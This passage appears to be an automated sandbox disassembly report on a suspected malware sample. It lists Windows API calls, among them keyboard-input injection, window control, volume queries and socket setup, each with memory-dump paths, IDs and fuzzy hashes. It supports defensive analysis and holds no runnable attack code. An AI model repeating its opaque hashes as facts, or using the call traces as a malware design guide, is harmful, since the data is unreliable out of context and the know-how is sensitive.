                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00CA531F
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CA5373
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00CCDBF4), ref: 00CA53E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                • Opcode ID: a0f27cd36244cf0fec291a336a560ad4c5595e2065dfee9a47676a11c2a397e9
                                                                                • Instruction ID: 4cc4ac25f1fabace873bdbc698ab81fb032389aad877d96bb05e3dedffb496f3
                                                                                • Opcode Fuzzy Hash: a0f27cd36244cf0fec291a336a560ad4c5595e2065dfee9a47676a11c2a397e9
                                                                                • Instruction Fuzzy Hash: C2317375600109AFDB10DF64C885EAEB7F8EF05308F1480A8F509DB262D771EE46DB61
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CC492B
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CC4940
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CC494D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 2b42bdaa931ea316d61183c178f4f6dc59b251cfb2ccb4e90013ff3dc7bbc082
                                                                                • Instruction ID: 84c0044d3908a3548616b3c996df08a0220290570aaacaf2f137a8af024f1592
                                                                                • Opcode Fuzzy Hash: 2b42bdaa931ea316d61183c178f4f6dc59b251cfb2ccb4e90013ff3dc7bbc082
                                                                                • Instruction Fuzzy Hash: EB11C631240248BEEF115F25CC06FEB7BACEF85B64F118528FB55E61A0D671DC519B20
                                                                                APIs
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                  • Part of subcall function 00C935B2: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C935D0
                                                                                  • Part of subcall function 00C935B2: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C935E1
                                                                                  • Part of subcall function 00C935B2: GetCurrentThreadId.KERNEL32 ref: 00C935E8
                                                                                  • Part of subcall function 00C935B2: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C935EF
                                                                                • GetFocus.USER32 ref: 00C93782
                                                                                  • Part of subcall function 00C935F9: GetParent.USER32(00000000), ref: 00C93604
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00C937CD
                                                                                • EnumChildWindows.USER32(?,00C93845), ref: 00C937F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                • String ID: %s%d
                                                                                • API String ID: 1272988791-1110647743
                                                                                • Opcode ID: 18483885c9bf0e7b5bc7c6d8d2626af00f129322a0784a455a88b38080dac43f
                                                                                • Instruction ID: 17168bfb2c677de3c1ce669689b9a231001a2295648997087f9a80cb3c9b78fc
                                                                                • Opcode Fuzzy Hash: 18483885c9bf0e7b5bc7c6d8d2626af00f129322a0784a455a88b38080dac43f
                                                                                • Instruction Fuzzy Hash: 0E1193B16002455BCF156F608C89BEE776A9F48304F044079F91A9B292DB305A46DB70
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00C8E55E
                                                                                • FreeLibrary.KERNEL32 ref: 00C8E584
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                • API String ID: 3013587201-2590602151
                                                                                • Opcode ID: 0fb0d5b4704ba48dbe182e49a3069e8e335388e4b0f137e4671916835148a9e8
                                                                                • Instruction ID: bddf8fd3973fd83afd1a5e0ae075ad45c93d956ebf539596ce4e6c0ce9d6116b
                                                                                • Opcode Fuzzy Hash: 0fb0d5b4704ba48dbe182e49a3069e8e335388e4b0f137e4671916835148a9e8
                                                                                • Instruction Fuzzy Hash: 76E02B719066219BD76273A08C48F6D22247F11B08F6C4868E907F7154FF20CE448794
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc0466c25a52e7ef0ad5cb88358c90814aa2a0740113ea92bd9a605d8cc9dce3
                                                                                • Instruction ID: f01dfd7440ade4b7c5899528a78eecc12c20d795aed4063932fcdd4e96eedc22
                                                                                • Opcode Fuzzy Hash: fc0466c25a52e7ef0ad5cb88358c90814aa2a0740113ea92bd9a605d8cc9dce3
                                                                                • Instruction Fuzzy Hash: AAC15C75A00216EFDB04CF98C888EAEB7B5FF48714F218598E515EB251D731EE81DB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: __alldvrm$_strrchr
                                                                                • String ID:
                                                                                • API String ID: 1036877536-0
                                                                                • Opcode ID: b7f10559f626c80453af757d5ec9f0138941ef8a887e3562974eb8c521b6b901
                                                                                • Instruction ID: 9e1834e1f89969a022efd4fff5290a59f5c99badcf58a79e288f15a32e175194
                                                                                • Opcode Fuzzy Hash: b7f10559f626c80453af757d5ec9f0138941ef8a887e3562974eb8c521b6b901
                                                                                • Instruction Fuzzy Hash: 75A155729043869FDB39CF28C8D2BBEBBE5EF55310F18416DE5A69B281C6348E81C750
                                                                                APIs
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CD0BCC,?), ref: 00C90E0F
                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CD0BCC,?), ref: 00C90E27
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,00CCDC00,000000FF,?,00000000,00000800,00000000,?,00CD0BCC,?), ref: 00C90E4C
                                                                                • _memcmp.LIBVCRUNTIME ref: 00C90E6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                • String ID:
                                                                                • API String ID: 314563124-0
                                                                                • Opcode ID: 51e7f295b4a25bfa384ab54f17105979df8f7ebff3649829e7f840344a055bba
                                                                                • Instruction ID: 13044a0e52e4080713382e5fdaebab4ef2ef17970a24a394112e07516865868f
                                                                                • Opcode Fuzzy Hash: 51e7f295b4a25bfa384ab54f17105979df8f7ebff3649829e7f840344a055bba
                                                                                • Instruction Fuzzy Hash: B1810771A00209EFCF04DF94C888EEEB7B9FF89315F204558E516AB250DB71AE46CB60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 830fa19cd12f5e417a28c1d3bec0c33df5a421509b2408fc881838af2f936502
                                                                                • Instruction ID: bb2e56835179cb53f23a412aef57833326872c41d5b03be262a4b56f657eaf85
                                                                                • Opcode Fuzzy Hash: 830fa19cd12f5e417a28c1d3bec0c33df5a421509b2408fc881838af2f936502
                                                                                • Instruction Fuzzy Hash: AC413B31A006006BDB356EBE8C82A6E3BA8EF46770F1D8655FD2CD71D1DA344941A363
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00CB2343
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB2351
                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CB23D0
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB23DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$socket
                                                                                • String ID:
                                                                                • API String ID: 1881357543-0
                                                                                • Opcode ID: 87b351ef466269eb5bdf74c761b332788d9252cf7aa6094d6d2435a56237696a
                                                                                • Instruction ID: 93b83842ca0478ef0b28ff17b30440e4a5490526eb6d6458f48a8715766b78f7
                                                                                • Opcode Fuzzy Hash: 87b351ef466269eb5bdf74c761b332788d9252cf7aa6094d6d2435a56237696a
                                                                                • Instruction Fuzzy Hash: E641BF74600200AFE720AF24C886F6A77E5AB04718F54C45CF96A9F6D3C776ED82DB90
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 00CC6957
                                                                                • ScreenToClient.USER32(?,?), ref: 00CC698A
                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CC69F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 4f067f07613f5913797d90190cb1c497865c070c4da551fd0d786ede62be9307
                                                                                • Instruction ID: 530041142b6583216646f3dd74d4af9a250a526cbae98ded89d5ed17aaced386
                                                                                • Opcode Fuzzy Hash: 4f067f07613f5913797d90190cb1c497865c070c4da551fd0d786ede62be9307
                                                                                • Instruction Fuzzy Hash: 12511A35A00209EFCB14DF64DA84FAE7BB6EB44360F108159F965A72A0D730EE91DB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 176046ee51ab8276203df0bb99faeb07403464bcb5be2edef8b9f5849e7e25c6
                                                                                • Instruction ID: 5579369390aec4f7d80cb72ddb9c2483fda5edb95a8a4508be5cbab34c00f367
                                                                                • Opcode Fuzzy Hash: 176046ee51ab8276203df0bb99faeb07403464bcb5be2edef8b9f5849e7e25c6
                                                                                • Instruction Fuzzy Hash: E041C771A00714BFE734AF78CC81B6ABBB9EB88710F10862AF155DB2C1D7759E819790
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,?,?,?), ref: 00C9B2D0
                                                                                • SetKeyboardState.USER32(00000080,?,?), ref: 00C9B2EC
                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00C9B35A
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,?), ref: 00C9B3AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 61744842003e2ca895a4c2c3be80060d934d6ff11db4fe140d853bb0b2461c96
                                                                                • Instruction ID: de11d4316d4c80ebac87b5714d6f7dbb759313398a944648abdc55ffe969096a
                                                                                • Opcode Fuzzy Hash: 61744842003e2ca895a4c2c3be80060d934d6ff11db4fe140d853bb0b2461c96
                                                                                • Instruction Fuzzy Hash: D3311870940258FEEF20CA65ED0DBFEBBA5BB45310F08421AF0A5561F0CB748F819791
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C9B415
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C9B431
                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C9B498
                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C9B4EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 2f0b9282ae25fc124096ce28769477c300bc77595c9fbf02e7d75f42e4d87377
                                                                                • Instruction ID: 1146044e57d1e6c79a7450fbcbd2a5311ed737bd200219568059c91278bc1ce9
                                                                                • Opcode Fuzzy Hash: 2f0b9282ae25fc124096ce28769477c300bc77595c9fbf02e7d75f42e4d87377
                                                                                • Instruction Fuzzy Hash: 9B314830940248BEFF318B65E90CBFE7BA5AF44724F08821AE4A5562D2D3748E51A7A1
                                                                                APIs
                                                                                  • Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11
                                                                                • _wcslen.LIBCMT ref: 00C9E794
                                                                                • _wcslen.LIBCMT ref: 00C9E7AB
                                                                                • _wcslen.LIBCMT ref: 00C9E7D6
                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C9E7E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$ExtentPoint32Text
                                                                                • String ID:
                                                                                • API String ID: 3763101759-0
                                                                                • Opcode ID: 9ed10b0d8c17189696ca2844b901d429254f49ac059433c679c3acb07e8538fe
                                                                                • Instruction ID: 4f068ef3373500b0251d95c6e86f95394a6c7edc1e398319c4d5767e4569c430
                                                                                • Opcode Fuzzy Hash: 9ed10b0d8c17189696ca2844b901d429254f49ac059433c679c3acb07e8538fe
                                                                                • Instruction Fuzzy Hash: 1521D175D00214AFCB10EFA8C885BAEBBF9EF55351F244064EC04AB281D6709E81CBA6
                                                                                APIs
                                                                                  • Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2
                                                                                • GetCursorPos.USER32(?), ref: 00CC9609
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CC961E
                                                                                • GetCursorPos.USER32(?), ref: 00CC9666
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00CC969C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 2355bede67459c5e81bb2303e0dbb6736bda88b0c49eb69e22970fdbb4937d40
                                                                                • Instruction ID: f3282d3e45ca7b9d2abe060fb022db1444b82ce712b63a486bd4399f727d972c
                                                                                • Opcode Fuzzy Hash: 2355bede67459c5e81bb2303e0dbb6736bda88b0c49eb69e22970fdbb4937d40
                                                                                • Instruction Fuzzy Hash: C221BC35501118AFCB258F94CC9CFFE7BB9EB89310F0041A9F9158B2A1C3319E50EB60
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00CC2EE4
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC2EFE
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC2F0C
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CC2F1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: bb3ec6ca5dc130d8b8683abf87302c859149247c85a32375fa88ab0846871f38
                                                                                • Instruction ID: 2d7c0a0af4a6ef74439543a801f48d3561feeeb88c9a259affb9207ce45f7b17
                                                                                • Opcode Fuzzy Hash: bb3ec6ca5dc130d8b8683abf87302c859149247c85a32375fa88ab0846871f38
                                                                                • Instruction Fuzzy Hash: 2921C232208521AFD7149B14C845FAEBBA5FF86324F18815CF4269B2D2CB71ED82CBD0
                                                                                APIs
                                                                                  • Part of subcall function 00C99599: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C98126,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?), ref: 00C995A8
                                                                                  • Part of subcall function 00C99599: lstrcpyW.KERNEL32(00000000,?,?,00C98126,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C995CE
                                                                                  • Part of subcall function 00C99599: lstrcmpiW.KERNEL32(00000000,?,00C98126,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?), ref: 00C995FF
                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C9813F
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C98165
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C98F70,00000000,?,0000001C,?,?,00000000), ref: 00C981A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
